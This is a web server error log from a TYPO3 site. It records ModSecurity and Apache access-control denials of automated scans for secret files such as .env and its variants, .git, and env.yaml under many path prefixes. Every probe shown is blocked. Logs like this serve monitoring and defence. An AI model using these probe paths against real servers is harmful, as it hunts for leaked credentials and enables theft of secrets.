[Fri Nov 28 21:10:15.176995 2025] [:error] [pid 387638] [client 3.23.113.253:38922] [client 3.23.113.253] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aSoBp-lfIsf8iBzToT1BQQAAABg"]
[Fri Nov 28 21:10:15.374763 2025] [:error] [pid 393308] [client 3.23.113.253:39176] [client 3.23.113.253] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sitemaps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "aSoBp6-Idoxz20B0R39VEgAAAAI"]
[Fri Nov 28 21:10:15.374984 2025] [:error] [pid 393308] [client 3.23.113.253:39176] [client 3.23.113.253] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "aSoBp6-Idoxz20B0R39VEgAAAAI"]
[Fri Nov 28 21:10:15.375167 2025] [:error] [pid 393308] [client 3.23.113.253:39176] [client 3.23.113.253] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "aSoBp6-Idoxz20B0R39VEgAAAAI"]
[Fri Nov 28 21:10:15.704614 2025] [:error] [pid 387638] [client 3.23.113.253:38922] [client 3.23.113.253] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aSoBp-lfIsf8iBzToT1BQgAAABg"]
[Fri Nov 28 21:10:15.704831 2025] [:error] [pid 387638] [client 3.23.113.253:38922] [client 3.23.113.253] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aSoBp-lfIsf8iBzToT1BQgAAABg"]
[Fri Nov 28 21:10:15.705020 2025] [:error] [pid 387638] [client 3.23.113.253:38922] [client 3.23.113.253] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aSoBp-lfIsf8iBzToT1BQgAAABg"]
[Fri Nov 28 21:10:15.923526 2025] [:error] [pid 393308] [client 3.23.113.253:39176] [client 3.23.113.253] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /exapi/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "aSoBp6-Idoxz20B0R39VEwAAAAI"]
[Fri Nov 28 21:10:15.923882 2025] [:error] [pid 393308] [client 3.23.113.253:39176] [client 3.23.113.253] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "aSoBp6-Idoxz20B0R39VEwAAAAI"]
[Fri Nov 28 21:10:15.924197 2025] [:error] [pid 393308] [client 3.23.113.253:39176] [client 3.23.113.253] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "aSoBp6-Idoxz20B0R39VEwAAAAI"]
[Fri Nov 28 21:10:16.131936 2025] [:error] [pid 387638] [client 3.23.113.253:38922] [client 3.23.113.253] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aSoBqOlfIsf8iBzToT1BQwAAABg"]
[Fri Nov 28 21:10:16.132196 2025] [:error] [pid 387638] [client 3.23.113.253:38922] [client 3.23.113.253] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aSoBqOlfIsf8iBzToT1BQwAAABg"]
[Fri Nov 28 21:10:16.132426 2025] [:error] [pid 387638] [client 3.23.113.253:38922] [client 3.23.113.253] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aSoBqOlfIsf8iBzToT1BQwAAABg"]
[Fri Nov 28 21:10:16.361828 2025] [:error] [pid 393308] [client 3.23.113.253:39176] [client 3.23.113.253] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aSoBqK-Idoxz20B0R39VFAAAAAI"]
[Fri Nov 28 21:10:16.362067 2025] [:error] [pid 393308] [client 3.23.113.253:39176] [client 3.23.113.253] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aSoBqK-Idoxz20B0R39VFAAAAAI"]
[Fri Nov 28 21:10:16.362248 2025] [:error] [pid 393308] [client 3.23.113.253:39176] [client 3.23.113.253] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aSoBqK-Idoxz20B0R39VFAAAAAI"]
[Fri Nov 28 21:10:16.363412 2025] [:error] [pid 387638] [client 3.23.113.253:38922] [client 3.23.113.253] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tools/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "aSoBqOlfIsf8iBzToT1BRAAAABg"]
[Fri Nov 28 21:10:16.363603 2025] [:error] [pid 387638] [client 3.23.113.253:38922] [client 3.23.113.253] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "aSoBqOlfIsf8iBzToT1BRAAAABg"]
[Fri Nov 28 21:10:16.363778 2025] [:error] [pid 387638] [client 3.23.113.253:38922] [client 3.23.113.253] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "aSoBqOlfIsf8iBzToT1BRAAAABg"]
[Fri Nov 28 21:10:16.815243 2025] [:error] [pid 391534] [client 3.23.113.253:38990] [client 3.23.113.253] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "aSoBqIXAn3U8Qs12Ils-SwAAAAw"]
[Fri Nov 28 21:10:16.815475 2025] [:error] [pid 391534] [client 3.23.113.253:38990] [client 3.23.113.253] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "aSoBqIXAn3U8Qs12Ils-SwAAAAw"]
[Fri Nov 28 21:10:16.815670 2025] [:error] [pid 391534] [client 3.23.113.253:38990] [client 3.23.113.253] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "aSoBqIXAn3U8Qs12Ils-SwAAAAw"]
[Fri Nov 28 21:10:17.731372 2025] [:error] [pid 391534] [client 3.23.113.253:38990] [client 3.23.113.253] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aSoBqYXAn3U8Qs12Ils-TQAAAAw"]
[Fri Nov 28 21:10:17.731636 2025] [:error] [pid 391534] [client 3.23.113.253:38990] [client 3.23.113.253] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aSoBqYXAn3U8Qs12Ils-TQAAAAw"]
[Fri Nov 28 21:10:17.731958 2025] [:error] [pid 391534] [client 3.23.113.253:38990] [client 3.23.113.253] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aSoBqYXAn3U8Qs12Ils-TQAAAAw"]
[Sat Nov 29 21:59:08.586386 2025] [authz_core:error] [pid 415628] [client 93.123.109.7:41268] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Nov 30 05:10:45.283950 2025] [authz_core:error] [pid 421120] [client 3.108.65.9:38240] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Nov 30 05:10:45.641010 2025] [:error] [pid 421122] [client 3.108.65.9:38244] [client 3.108.65.9] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSvDxS6tRBnriPIR7Vg46AAAAAw"]
[Sun Nov 30 05:10:45.641267 2025] [:error] [pid 421122] [client 3.108.65.9:38244] [client 3.108.65.9] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSvDxS6tRBnriPIR7Vg46AAAAAw"]
[Sun Nov 30 05:10:45.641435 2025] [:error] [pid 421122] [client 3.108.65.9:38244] [client 3.108.65.9] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSvDxS6tRBnriPIR7Vg46AAAAAw"]
[Sun Nov 30 05:10:45.998068 2025] [:error] [pid 420135] [client 3.108.65.9:38250] [client 3.108.65.9] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aSvDxbzC2G0Eflpzmc0RLwAAAAM"]
[Sun Nov 30 05:10:45.998305 2025] [:error] [pid 420135] [client 3.108.65.9:38250] [client 3.108.65.9] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aSvDxbzC2G0Eflpzmc0RLwAAAAM"]
[Sun Nov 30 05:10:45.998511 2025] [:error] [pid 420135] [client 3.108.65.9:38250] [client 3.108.65.9] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aSvDxbzC2G0Eflpzmc0RLwAAAAM"]
[Sun Nov 30 05:10:46.355923 2025] [:error] [pid 420464] [client 3.108.65.9:53126] [client 3.108.65.9] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aSvDxkcZD8PDK2e2JM-tSgAAAA4"]
[Sun Nov 30 05:10:46.356160 2025] [:error] [pid 420464] [client 3.108.65.9:53126] [client 3.108.65.9] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aSvDxkcZD8PDK2e2JM-tSgAAAA4"]
[Sun Nov 30 05:10:46.356349 2025] [:error] [pid 420464] [client 3.108.65.9:53126] [client 3.108.65.9] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aSvDxkcZD8PDK2e2JM-tSgAAAA4"]
[Sun Nov 30 05:10:46.713452 2025] [:error] [pid 420349] [client 3.108.65.9:53128] [client 3.108.65.9] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aSvDxkCvgKj4T6lHnsBGTwAAAAU"]
[Sun Nov 30 05:10:46.713676 2025] [:error] [pid 420349] [client 3.108.65.9:53128] [client 3.108.65.9] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aSvDxkCvgKj4T6lHnsBGTwAAAAU"]
[Sun Nov 30 05:10:46.713864 2025] [:error] [pid 420349] [client 3.108.65.9:53128] [client 3.108.65.9] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aSvDxkCvgKj4T6lHnsBGTwAAAAU"]
[Sun Nov 30 05:10:47.070361 2025] [authz_core:error] [pid 421121] [client 3.108.65.9:53136] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak
[Sun Nov 30 05:10:47.422812 2025] [:error] [pid 420133] [client 3.108.65.9:53140] [client 3.108.65.9] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aSvDx_fwd7-miQKNV8YTtgAAAAE"]
[Sun Nov 30 05:10:47.423031 2025] [:error] [pid 420133] [client 3.108.65.9:53140] [client 3.108.65.9] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aSvDx_fwd7-miQKNV8YTtgAAAAE"]
[Sun Nov 30 05:10:47.423216 2025] [:error] [pid 420133] [client 3.108.65.9:53140] [client 3.108.65.9] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aSvDx_fwd7-miQKNV8YTtgAAAAE"]
[Sun Nov 30 05:10:48.562625 2025] [authz_core:error] [pid 420351] [client 3.108.65.9:53172] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/env.yaml
[Sun Nov 30 05:10:48.919568 2025] [authz_core:error] [pid 421120] [client 3.108.65.9:53184] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/env.yml
